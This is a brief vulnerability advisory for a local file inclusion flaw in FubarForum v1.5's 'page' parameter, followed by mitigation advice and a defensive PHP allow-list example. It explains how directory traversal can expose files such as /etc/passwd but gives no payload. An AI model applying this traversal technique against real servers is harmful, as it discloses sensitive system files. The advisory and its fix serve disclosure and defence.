Vendor: FubarForum v1.5
By: cOndemned
CVSS: 7.5 (HIGH)
Local File Inclusion
CWE: 22
Product Name: FubarForum v1.5
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
FubarForum v1.5 Local File Inclusion Vulnerability
FubarForum v1.5 contains a local file inclusion vulnerability. The application does not properly sanitize user-supplied input to the 'page' parameter of the 'index.php' script. An attacker can exploit this by sending a crafted HTTP request that contains directory traversal characters to the vulnerable script. This allows the attacker to include arbitrary local files from the web server, such as the server's '/etc/passwd' file, resulting in the disclosure of sensitive information.
Mitigation:
Validate user-supplied input, in particular the 'page' parameter, before it is used to build a file path, so that directory traversal sequences are rejected. Additionally, use web server access control lists to restrict access to sensitive files.
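One way to apply the input validation described above, shown as an added example and not FubarForum's own code: an allow-list for the 'page' parameter backed by a canonical-path containment check. The `pages` directory, the page names and the `resolve_page` helper are assumptions made for illustration.

```php
<?php
// Added example: hypothetical page resolver, not taken from FubarForum.
// Assumption: page templates live in one directory as "<name>.php".
const PAGES_DIR = __DIR__ . '/pages';                          // assumed layout
const ALLOWED_PAGES = ['home', 'forum', 'profile', 'search'];  // assumed names

/**
 * Map a requested page name to a file path, or null if it must be refused.
 */
function resolve_page(string $requested): ?string
{
    // 1. Allow-list: only exact, known page names pass. Traversal
    //    sequences, encoded separators and absolute paths never match.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }

    // 2. Defense in depth: canonicalise the path (resolving symlinks and
    //    "..") and confirm the result is still inside the pages directory.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $requested . '.php');
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved outside the pages directory
    }
    return $path;
}

// Request handling: a non-string value (e.g. page[]=x) is refused as well.
$page = $_GET['page'] ?? 'home';
$file = is_string($page) ? resolve_page($page) : null;

if ($file === null) {
    // Log the refused value so traversal attempts are visible to responders.
    error_log('refused page parameter: ' . json_encode($page));
    http_response_code(404);
    exit('Page not found');
}

require $file;
```

The allow-list alone stops traversal; the `realpath` check covers the case where a symlink or a later change to the allow-list would otherwise let a path escape the pages directory.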